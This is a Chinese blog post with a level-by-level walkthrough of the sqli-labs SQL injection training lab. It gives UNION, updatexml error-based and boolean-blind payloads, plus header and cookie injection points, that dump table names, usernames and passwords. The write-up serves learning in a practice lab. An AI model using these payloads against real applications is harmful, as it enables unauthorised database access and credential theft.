



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="welcome to my blog" href="https://hq185187.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="welcome to my blog" href="https://hq185187.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="welcome to my blog" href="https://hq185187.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="java,git,springcloud" />


<link rel="canonical" href="https://hq185187.github.io/2023/04/24/sqli-labs/">



  <title>
Sqli-labs靶场通关 |
不良人天藏星 = welcome to my blog = 不良人总舵</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Sqli-labs靶场通关
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-04-24 00:32:55">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-04-24T00:32:55+08:00">2023-04-24</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">不良人天藏星</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giciundwu5j20zk0m8n9e.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclhnx9glj20zk0m8npd.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipeubcbajj20zk0m8h1h.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclx6phq6j20zk0m8e36.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1giclfw2t96j20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva4.sinaimg.cn/large/6833939bly1gipexe4oykj20zk0m87ji.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://hq185187.github.io/2023/04/24/sqli-labs/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="hq185187">
    <meta itemprop="description" content="不良人总舵, 不定时更新web安全相关知识">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="welcome to my blog">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h3 id="怎么判断字符型或者数字型"><a class="markdownIt-Anchor" href="#怎么判断字符型或者数字型">#</a> 怎么判断字符型或者数字型？</h3>
<p>数字型:id=2 和 id=3-1 返回界面相同<br>
原理：说明 2-1 被解析了，旁边没有引号<br>
字符型:id=2 和 id=2a 页面一样就行<br>
原理：MySQL 等号两边类型不一致会发生强制转换，字符串 -&gt; 数字</p>
<p>group_concat 是用，连接多行记录的函数</p>
<p>less1<br>
 字符型注入<br>
看源码:sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;</p>
<p>因此:<mark>payload:1’   操作   --+</mark></p>
<p>?id=1’ order by 3–+<br>
?id=1’ order by 4–+<br>
?id=-1’ union select 1,2,3–+// 判断回显位<br>
？id=-1’ union select 1,2,database ()–+<br>
?id=-1’ union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+</p>
<p>?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=database()–+</p>
<p>?id=-1’ union select 1,group_concat(username),group_concat(password) from users–+</p>
<p>less2<br>
 数字型<br>
看源码:sql=“SELECT * FROM users WHERE id=$id LIMIT 0,1”;<br>
 直接输入数字就好，解法与 less1 相同，去掉 less1 的’和–+ 即可</p>
<p>布尔盲注:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and (select mid((group_concat(username,0x7e,password) from users),1,1))=&#x27;D&#x27;</span><br></pre></td></tr></table></figure>
<p>less3<br>
id=1’)–+</p>
<p>less4<br>
id=1&quot;)–+</p>
<p>less5<br>
 报错注入:updatexml 函数<br>
 updatexml (xml_doument,XPath_string,new_value)<br>
 第一个参数：XML 的内容<br>
第二个参数：是需要 update 的位置 XPATH 路径<br>
第三个参数：是更新后的内容<br>
所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合 XPATH 格式，不对就爆出正确内容<br>
可以校验的：0x7e (~),0x5e24 (^$),’#’(#)<br>
payload:<br>
?id=1’ and updatexml (1,concat (0x7e,database ()),1)–+ 暴当前数据库</p>
<p>?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database())),1)–+<br>
 此时会出现 Subquery returns more than 1 row<br>
1. 可以用 limit 解决，limit 0,1 1,1 2,1 3,1<br>
 在 limit 3,1 找到 users 表<br>
？id=1’ and updatexml (1,concat (0x7e,(select table_name from information_schema.tables where table_schema=database () limit 3,1)),1)–+<br>
 后面同理爆字段<br>
 2. 加个 group_concat 解决<br>
？id=1’ and updatexml (1,concat (0x7e,(select group_concat (table_name) from information_schema.tables where table_schema=database ())),1)–+<br>
 过程同上<br>
最后<br>
？id=1’ and updatexml (1,concat (0x7e,(select group_concat (username) from users)),1)–+</p>
<p>substr 方法<br>
’ or updatexml (1,concat (0x7e,substr ((select group_concat (schema_name) from information_schema.schemata),1,31),0x7e),1)–+<br>
 后面把 1,31 换成 32,31<br>
63,31<br>
94,31</p>
<p>less6<br>
id=1&quot; 与 less5 一样</p>
<p>less7<br>
 布尔盲注<br>
根据页面回显试探数据，可以二分法，函数:substring (),mid (),substr ().<br>
eg.?id=1’ and (select mid((select concat(user,0x7e,password) from users),1,1))=’’–+<br>
 一直到 less10, 布尔和时间盲注直接用 sqlimap</p>
<p>less11<br>
 输入？id=1 发现 url 地址没有显示，抓包发现 post 方式<br>
 uname=11&amp;passwd=1&amp;submit=Submit<br>
 判断字符型<br>
接下来用基本的 union 注入就欧克<br>
 less12<br>
&quot;) 型，联合注入<br>
 less13<br>
)’ # 加上报错注入<br>
 less14<br>
“# 加上报错注入<br>
 less15<br>
 不显示报错信息只能盲注<br>
单引号字符型的布尔盲注:<br>
1’ --+<br>
<span class="exturl" data-url="aHR0cDovL3huLS1sZXNzMTUtMmc0bTA3M2dtcXcucHk="> 用脚本 less15.py</span><br>
 用法:<br>
from less15 import *<br>
Database15()<br>
Tables15()<br>
 Columns15 (‘库’,‘表’)<br>
 Content15 (‘库’,‘表’,‘字段’,‘字段’)<br>
less16<br>
 双引号字符型加括号的盲注<br>
 1”) --+<br>
 脚本:less16.py</p>
<p>less17<br>
1. 注入点在 password 栏里，单引号字符加报错注入<br>
 2. 先抓包，copy to file, 用 sqlmap 工具<br>
 python3 <span class="exturl" data-url="aHR0cDovL3NxbG1hcC5weQ==">sqlmap.py</span> -r 路径</p>
<p>less18<br>
 注入点在 user-agent, 且用户名密码必须正确<br>
注意：闭合之前的部分必须为空，很恶心<br>
’ or updatexml (1,concat (0x7e,(select group_concat (table_name) from information_schema.tables where table_schema=database ())),1) or’</p>
<p>最后:<br>
’ or updatexml(1,concat(0x7e,(select group_concat(concat(username))from security.users)),1) or’</p>
<p>less19<br>
 与 18 一样，注入点在 referer</p>
<p>less20<br>
 输入正确的用户名和密码，抓到两个包，get 包里有 cookie, 注入点在 cookie</p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-04-26 18:21:15" itemprop="dateModified" datetime="2023-04-26T18:21:15+08:00">2023-04-26</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>hq185187 <i class="ic i-at"><em>@</em></i>welcome to my blog
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://hq185187.github.io/2023/04/24/sqli-labs/" title="Sqli-labs靶场通关">https://hq185187.github.io/2023/04/24/sqli-labs/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/04/23/hello-world/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipeun65urj20zk0m81ii.jpg" title="Hello World">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Hello World</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/04/26/nessctf/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicm0fdw5cj20zk0m8hdt.jpg" title="NSSCTF精选">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>NSSCTF精选</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%88%96%E8%80%85%E6%95%B0%E5%AD%97%E5%9E%8B"><span class="toc-number">1.</span> <span class="toc-text"> 怎么判断字符型或者数字型？</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="hq185187"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">hq185187</p>
  <div class="description" itemprop="description">不定时更新web安全相关知识</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">5</span>
        <span class="name">文章</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2hxMTg1MTg3" title="https:&#x2F;&#x2F;github.com&#x2F;hq185187"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/04/23/hello-world/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/04/26/nessctf/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/%E6%97%A0%E5%AD%97%E6%AF%8Drce/" title="无字母数字rce">无字母数字rce</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/24/sqli-labs/" title="Sqli-labs靶场通关">Sqli-labs靶场通关</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/nessctf/" title="NSSCTF精选">NSSCTF精选</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含及伪协议的使用">文件包含及伪协议的使用</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/23/hello-world/" title="Hello World">Hello World</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hq185187 @ 不良人天藏星</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/04/24/sqli-labs/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
